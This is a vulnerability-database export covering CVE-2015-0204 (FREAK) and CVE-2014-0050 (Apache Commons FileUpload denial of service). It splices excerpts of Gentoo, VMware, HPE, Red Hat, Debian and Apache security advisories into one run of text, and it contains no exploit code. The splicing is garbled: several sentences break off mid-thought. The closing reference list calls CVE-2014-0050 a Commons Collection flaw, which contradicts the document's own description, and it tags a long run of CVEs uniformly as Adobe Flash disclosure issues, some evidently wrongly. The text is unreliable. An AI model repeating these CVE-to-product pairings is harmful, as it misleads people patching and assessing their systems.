            "url": "https://service.sap.com/sap/support/notes/2059659\u003e."
          },
          {
            "trust": 0.1,
            "url": "https://www.smacktls.com/\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.erpscan.com/\u003e."
          },
          {
            "trust": 0.1,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0204\u003e"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0207"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0118"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8142"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0226"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0231"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3523"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0285"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9653"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9705"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0232"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9427"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0208"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0273"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0231"
          },
          {
            "trust": 0.1,
            "url": "http://www.hp.com/go/smh"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9652"
          },
          {
            "trust": 0.1,
            "url": "https://www.openssl.org/about/releasestrat.html),"
          },
          {
            "trust": 0.1,
            "url": "https://www.openssl.org/about/secpolicy.html"
          },
          {
            "trust": 0.1,
            "url": "http://css.csail.mit.edu/6.858/2013/readings/rsa-bug-attacks.pdf"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#243585"
          },
          {
            "db": "VULMON",
            "id": "CVE-2015-0204"
          },
          {
            "db": "BID",
            "id": "71936"
          },
          {
            "db": "PACKETSTORM",
            "id": "138473"
          },
          {
            "db": "PACKETSTORM",
            "id": "131940"
          },
          {
            "db": "PACKETSTORM",
            "id": "133316"
          },
          {
            "db": "PACKETSTORM",
            "id": "130987"
          },
          {
            "db": "PACKETSTORM",
            "id": "131387"
          },
          {
            "db": "PACKETSTORM",
            "id": "131408"
          },
          {
            "db": "PACKETSTORM",
            "id": "132268"
          },
          {
            "db": "PACKETSTORM",
            "id": "132763"
          },
          {
            "db": "PACKETSTORM",
            "id": "129867"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-001672"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0204"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#243585",
            "ident": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2015-0204",
            "ident": null
          },
          {
            "db": "BID",
            "id": "71936",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "138473",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "131940",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "133316",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "130987",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "131387",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "131408",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "132268",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "132763",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "129867",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-001672",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0204",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2015-03-06T00:00:00",
            "db": "CERT/CC",
            "id": "VU#243585",
            "ident": null
          },
          {
            "date": "2015-01-09T00:00:00",
            "db": "VULMON",
            "id": "CVE-2015-0204",
            "ident": null
          },
          {
            "date": "2015-01-08T00:00:00",
            "db": "BID",
            "id": "71936",
            "ident": null
          },
          {
            "date": "2016-08-22T23:25:00",
            "db": "PACKETSTORM",
            "id": "138473",
            "ident": null
          },
          {
            "date": "2015-05-20T23:06:10",
            "db": "PACKETSTORM",
            "id": "131940",
            "ident": null
          },
          {
            "date": "2015-08-26T01:33:07",
            "db": "PACKETSTORM",
            "id": "133316",
            "ident": null
          },
          {
            "date": "2015-03-24T17:05:09",
            "db": "PACKETSTORM",
            "id": "130987",
            "ident": null
          },
          {
            "date": "2015-04-13T14:03:56",
            "db": "PACKETSTORM",
            "id": "131387",
            "ident": null
          },
          {
            "date": "2015-04-14T18:54:44",
            "db": "PACKETSTORM",
            "id": "131408",
            "ident": null
          },
          {
            "date": "2015-06-11T23:51:55",
            "db": "PACKETSTORM",
            "id": "132268",
            "ident": null
          },
          {
            "date": "2015-07-21T13:37:51",
            "db": "PACKETSTORM",
            "id": "132763",
            "ident": null
          },
          {
            "date": "2015-01-09T02:01:10",
            "db": "PACKETSTORM",
            "id": "129867",
            "ident": null
          },
          {
            "date": "2015-03-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2015-001672",
            "ident": null
          },
          {
            "date": "2015-01-09T02:59:10.287000",
            "db": "NVD",
            "id": "CVE-2015-0204",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2015-10-27T00:00:00",
            "db": "CERT/CC",
            "id": "VU#243585",
            "ident": null
          },
          {
            "date": "2018-07-19T00:00:00",
            "db": "VULMON",
            "id": "CVE-2015-0204",
            "ident": null
          },
          {
            "date": "2018-10-08T07:00:00",
            "db": "BID",
            "id": "71936",
            "ident": null
          },
          {
            "date": "2017-03-09T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2015-001672",
            "ident": null
          },
          {
            "date": "2025-04-12T10:46:40.837000",
            "db": "NVD",
            "id": "CVE-2015-0204",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "network",
        "sources": [
          {
            "db": "BID",
            "id": "71936"
          }
        ],
        "trust": 0.3
      },
      "title": {
        "_id": null,
        "data": "SSL/TLS implementations accept export-grade RSA keys (FREAK attack)",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#243585"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "Design Error",
        "sources": [
          {
            "db": "BID",
            "id": "71936"
          }
        ],
        "trust": 0.3
      }
    }

    VAR-201404-0585

    Vulnerability from variot - Updated: 2026-03-09 21:05

    MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions. Apache Commons FileUpload is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause the application to enter an infinite loop which may cause denial-of-service conditions. The following products are vulnerable: Apache Commons FileUpload 1.0 through versions 1.3 Apache Tomcat 8.0.0-RC1 through versions 8.0.1 Apache Tomcat 7.0.0 through versions 7.0.50. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201412-29


                                            http://security.gentoo.org/
    

    Severity: Normal Title: Apache Tomcat: Multiple vulnerabilities Date: December 15, 2014 Bugs: #442014, #469434, #500600, #511762, #517630, #519590 ID: 201412-29


    Synopsis

    Multiple vulnerabilities have been found in Apache Tomcat, the worst of which may result in Denial of Service.

    Affected packages

    -------------------------------------------------------------------
     Package              /     Vulnerable     /            Unaffected
    -------------------------------------------------------------------
    

    1 www-servers/tomcat < 7.0.56 *>= 6.0.41 >= 7.0.56

    Description

    Multiple vulnerabilities have been discovered in Tomcat. Please review the CVE identifiers referenced below for details.

    Resolution

    All Tomcat 6.0.x users should upgrade to the latest version:

    # emerge --sync # emerge --ask --oneshot --verbose ">=www-servers/tomcat-6.0.41"

    All Tomcat 7.0.x users should upgrade to the latest version:

    # emerge --sync # emerge --ask --oneshot --verbose ">=www-servers/tomcat-7.0.56"

    References

    [ 1 ] CVE-2012-2733 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2733 [ 2 ] CVE-2012-3544 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3544 [ 3 ] CVE-2012-3546 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3546 [ 4 ] CVE-2012-4431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4431 [ 5 ] CVE-2012-4534 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4534 [ 6 ] CVE-2012-5885 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5885 [ 7 ] CVE-2012-5886 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5886 [ 8 ] CVE-2012-5887 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5887 [ 9 ] CVE-2013-2067 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2067 [ 10 ] CVE-2013-2071 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2071 [ 11 ] CVE-2013-4286 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4286 [ 12 ] CVE-2013-4322 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4322 [ 13 ] CVE-2013-4590 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4590 [ 14 ] CVE-2014-0033 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0033 [ 15 ] CVE-2014-0050 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0050 [ 16 ] CVE-2014-0075 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0075 [ 17 ] CVE-2014-0096 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0096 [ 18 ] CVE-2014-0099 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0099 [ 19 ] CVE-2014-0119 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0119

    Availability

    This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

    http://security.gentoo.org/glsa/glsa-201412-29.xml

    Concerns?

    Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

    License

    Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

    The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

    http://creativecommons.org/licenses/by-sa/2.5 . Summary

    VMware has updated vSphere third party libraries
    
    1. Relevant releases

      VMware vCenter Server 5.5 prior to Update 2

      VMware vCenter Update Manager 5.5 prior to Update 2

      VMware ESXi 5.5 without patch ESXi550-201409101-SG

    2. Problem Description

    a. vCenter Server Apache Struts Update

      The Apache Struts library is updated to address a security issue.
    
      This issue may lead to remote code execution after authentication.
    
      The Common Vulnerabilities and Exposures project (cve.mitre.org)
      has assigned the identifier CVE-2014-0114 to this issue.
    
    
      Column 4 of the following table lists the action required to
      remediate the vulnerability in each release, if a solution is 
      available.
    
      VMware         Product    Running Replace with/
      Product        Version    on        Apply Patch
      =============  =======    ======= =================
      vCenter Server 5.5       any         5.5 Update 2
      vCenter Server 5.1       any         Patch Pending
      vCenter Server 5.0       any         Patch Pending
    

    b.

      The Common Vulnerabilities and Exposures project (cve.mitre.org)
      has assigned the identifiers CVE-2013-4590, CVE-2013-4322, and 
      CVE-2014-0050 to these issues.
    
      Column 4 of the following table lists the action required to
      remediate the vulnerability in each release, if a solution is 
      available.
    
      VMware                 Product    Running    Replace with/
      Product                Version    on       Apply Patch
      =============          =======    =======    =================
      vCenter Server         5.5     any        5.5 Update 2
      vCenter Server         5.1     any        Patch Pending
      vCenter Server         5.0     any        Patch Pending
    

    c. Update to ESXi glibc package

      glibc is updated to address multiple security issues.
    
      The Common Vulnerabilities and Exposures project (cve.mitre.org)
      has assigned the identifiers CVE-2013-0242 and CVE-2013-1914 to 
      these issues.
    
      Column 4 of the following table lists the action required to
      remediate the vulnerability in each release, if a solution is 
      available.
    
      VMware         Product    Running  Replace with/
      Product        Version    on     Apply Patch
      =============  =======    =======  =================
      ESXi           5.5       any      ESXi550-201409101-SG
      ESXi           5.1       any      Patch Pending
      ESXi           5.0       any      Patch Pending
    

    d. vCenter and Update Manager, Oracle JRE 1.7 Update 55

      Oracle has documented the CVE identifiers that are addressed in 
      JRE 1.7.0 update 55 in the Oracle Java SE Critical Patch Update 
      Advisory of April 2014.
    
      Column 4 of the following table lists the action required to
      remediate the vulnerability in each release, if a solution is 
      available.
    
      VMware                 Product    Running  Replace with/
      Product                Version    on       Apply Patch
      =============          =======    =======  =================
      vCenter Server         5.5     any      5.5 Update 2
      vCenter Server         5.1     any      not applicable *
      vCenter Server         5.0     any      not applicable *
      vCenter Update Manager 5.5     any      5.5 Update 2
      vCenter Update Manager 5.1     any      not applicable *
      vCenter Update Manager 5.0     any      not applicable *
    
      * this product uses the Oracle JRE 1.6.0 family *
    
    1. Solution

    Please review the patch/release notes for your product and version and verify the checksum of your downloaded file.

    vCenter Server and Update Manager 5.5u2


    Downloads and Documentation: https://www.vmware.com/go/download-vsphere

    ESXi 5.5


    Download: https://www.vmware.com/patchmgr/findPatch.portal

    1. References

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4590 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4322 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0050 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0242 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1914

    JRE


    Oracle Java SE Critical Patch Update Advisory of April 2014

    http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html


    1. Change log

    2014-09-09 VMSA-2014-0008 Initial security advisory in conjunction with the release of vSphere 5.5 Update 2 on 2014-09-09. Contact

    E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

    This Security Advisory is posted to the following lists:

    security-announce at lists.vmware.com
    bugtraq at securityfocus.com
    fulldisclosure at seclists.org
    

    E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055

    VMware Security Advisories http://www.vmware.com/security/advisories

    VMware Security Response Policy https://www.vmware.com/support/policies/security_response.html

    VMware Lifecycle Support Phases https://www.vmware.com/support/policies/lifecycle.html

    Twitter https://twitter.com/VMwareSRC

    Copyright 2014 VMware Inc. All rights reserved. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

    Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05324755

    SUPPORT COMMUNICATION - SECURITY BULLETIN

    Document ID: c05324755 Version: 1

    HPSBGN03669 rev.1 - HPE SiteScope, Local Elevation of Privilege, Remote Denial of Service, Arbitrary Code Execution and Cross-Site Request Forgery

    NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

    Release Date: 2016-11-04 Last Updated: 2016-11-04

    Potential Security Impact: Local: Elevation of Privilege; Remote: Arbitrary Code Execution, Cross-Site Request Forgery (CSRF), Denial of Service (DoS)

    Source: Hewlett Packard Enterprise, Product Security Response Team

    VULNERABILITY SUMMARY Potential vulnerabilities have been identified in HPE SiteScope. The vulnerabilities could be exploited to allow local elevation of privilege and exploited remotely to allow denial of service, arbitrary code execution, cross-site request forgery.

    References:

    • CVE-2014-0114 - Apache Struts, execution of arbitrary code
    • CVE-2016-0763 - Apache Tomcat, denial of service (DoS)
    • CVE-2014-0107 - Apache XML Xalan, bypass expected restrictions
    • CVE-2015-3253 - Apache Groovy, execution of arbitrary code
    • CVE-2015-5652 - Python, elevation of privilege
    • CVE-2013-6429 - Spring Framework, cross-site request forgery
    • CVE-2014-0050 - Apache Commons FileUpload, denial of service (DoS)
    • PSRT110264

    SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

    • HP SiteScope Monitors Software Series 11.2xa11.32IP1

    BACKGROUND

    CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

    CVE-2013-6429
      6.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L
      6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
    
    CVE-2014-0050
      8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
      7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
    
    CVE-2014-0107
      8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
      7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
    
    CVE-2014-0114
      6.8 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
      7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
    
    CVE-2015-3253
      7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
      7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
    
    CVE-2015-5652
      8.6 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
      7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
    
    CVE-2016-0763
      6.3 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
      6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
    
    Information on CVSS is documented in
    HPE Customer Notice HPSN-2008-002 here:
    

    https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

    RESOLUTION

    HPE has provided a resolution via an update to HPE SiteScope. Details on the update and each vulnerability are in the KM articles below.

    Note: The resolution for each vulnerability listed is to upgrade to SiteScope 11.32IP2 or an even more recent version of SiteScope if available. The SiteScope update can be can found in the personal zone in "my updates" in HPE Software Support Online: https://softwaresupport.hpe.com.

    HISTORY Version:1 (rev.1) - 4 November 2016 Initial release

    Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.

    Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.

    Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com

    Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice

    Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive

    Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

    3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX

    Copyright 2016 Hewlett Packard Enterprise

    Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. Fuse MQ Enterprise, based on Apache ActiveMQ, is a standards-compliant messaging system that is tailored for use in mission critical applications.

    This release of Fuse ESB Enterprise/MQ Enterprise 7.1.0 R1 P3 is an update to Fuse ESB Enterprise 7.1.0 and Fuse MQ Enterprise 7.1.0. It includes various bug fixes, which are listed in the README file included with the patch files.

    The following security issues are also addressed with this release:

    It was found that XStream could deserialize arbitrary user-supplied XML content, representing objects of any type. (CVE-2013-7285)

    It was found that the Apache Camel XSLT component allowed XSL stylesheets to call external Java methods. (CVE-2014-0003)

    It was found that the ParserPool and Decrypter classes in the OpenSAML Java implementation resolved external entities, permitting XML External Entity (XXE) attacks. (CVE-2013-6440)

    It was found that the Apache Camel XSLT component would resolve entities in XML messages when transforming them using an XSLT route. By repeatedly sending a request for an authenticated resource while the victim is completing the login form, an attacker could inject a request that would be executed using the victim's credentials.

    CVE-2013-2071

    A runtime exception in AsyncListener.onComplete() prevents the request from 
    being recycled. This may expose elements of a previous request to a current 
    request.
    

    CVE-2013-4322

    When processing a request submitted using the chunked transfer encoding, 
    Tomcat ignored but did not limit any extensions that were included. by streaming an unlimited amount 
    of data to the server.
    

    For the stable distribution (wheezy), these problems have been fixed in version 7.0.28-4+deb7u1.

    For the testing distribution (jessie), these problems have been fixed in version 7.0.52-1.

    For the unstable distribution (sid), these problems have been fixed in version 7.0.52-1.

    We recommend that you upgrade your tomcat7 packages. This issue was found to be only partially addressed in CVE-2014-0094.

      CVE-2014-0050 may lead to a denial of service condition.
    
      vCenter Operations Management Suite (vCOps) is affected by both 
      CVE-2014-0112 and CVE-2014-0050.
    
      vCenter Orchestrator (vCO) is affected by CVE-2014-0050 and not 
      by CVE-2014-0112.
    
      Workaround
    
      A workaround for CVE-2014-0112 is documented in VMware Knowledge Base
      article 2081470. While Tomcat 6 uses Commons FileUpload as part of the Manager
    

    application, access to that functionality is limited to authenticated administrators. This issue was reported responsibly to the Apache Software Foundation via JPCERT but an error in addressing an e-mail led to the unintended early disclosure of this issue[1].

    Mitigation: Users of affected versions should apply one of the following mitigations - - Upgrade to Apache Commons FileUpload 1.3.1 or later once released - - Upgrade to Apache Tomcat 8.0.2 or later once released - - Upgrade to Apache Tomcat 7.0.51 or later once released - - Apply the appropriate patch - Commons FileUpload: http://svn.apache.org/r1565143 - Tomcat 8: http://svn.apache.org/r1565163 - Tomcat 7: http://svn.apache.org/r1565169 - - Limit the size of the Content-Type header to less than 4091 bytes

    Credit: This issue was reported to the Apache Software Foundation via JPCERT.

    Additionally a build problem with maven was discovered, fixed maven packages is also being provided with this advisory.

    References:

    • CVE-2009-5028 - Namazu Remote Denial of Service
    • CVE-2011-4345 - Namazu Cross-site Scripting
    • CVE-2014-0050 - Apache Commons Collection Unauthorized Disclosure of Information
    • CVE-2014-4877 - GNU Wget, Unauthorized Disclosure of Information
    • CVE-2015-5125 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5127 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5129 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5130 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5131 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5132 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5133 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5134 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5539 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5540 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5541 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5544 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5545 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5546 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5547 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5548 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5549 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5550 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5551 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5552 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5553 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5554 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5555 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5556 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5557 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5558 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5559 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5560 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5561 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5562 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5563 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5564 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5565 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5566 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5567 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5568 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5570 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5571 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5572 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5573 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5574 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5575 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5576 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5577 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5578 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5579 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5580 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5581 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5582 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5584 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5587 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-5588 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-6420 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-6676 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-6677 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-6678 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-6679 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-6682 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-7547 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8044 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8415 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8416 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8417 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8418 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8419 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8420 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8421 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8422 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8423 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8424 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8425 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8426 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8427 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8428 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8429 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8430 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8431 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8432 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8433 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8434 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8435 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8436 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8437 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8438 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8439 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8440 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8441 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8442 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8443 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8444 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8445 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8446 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8447 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8448 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8449 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8450 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8451 - Adobe Flash, Unauthorized Disclosure of Information
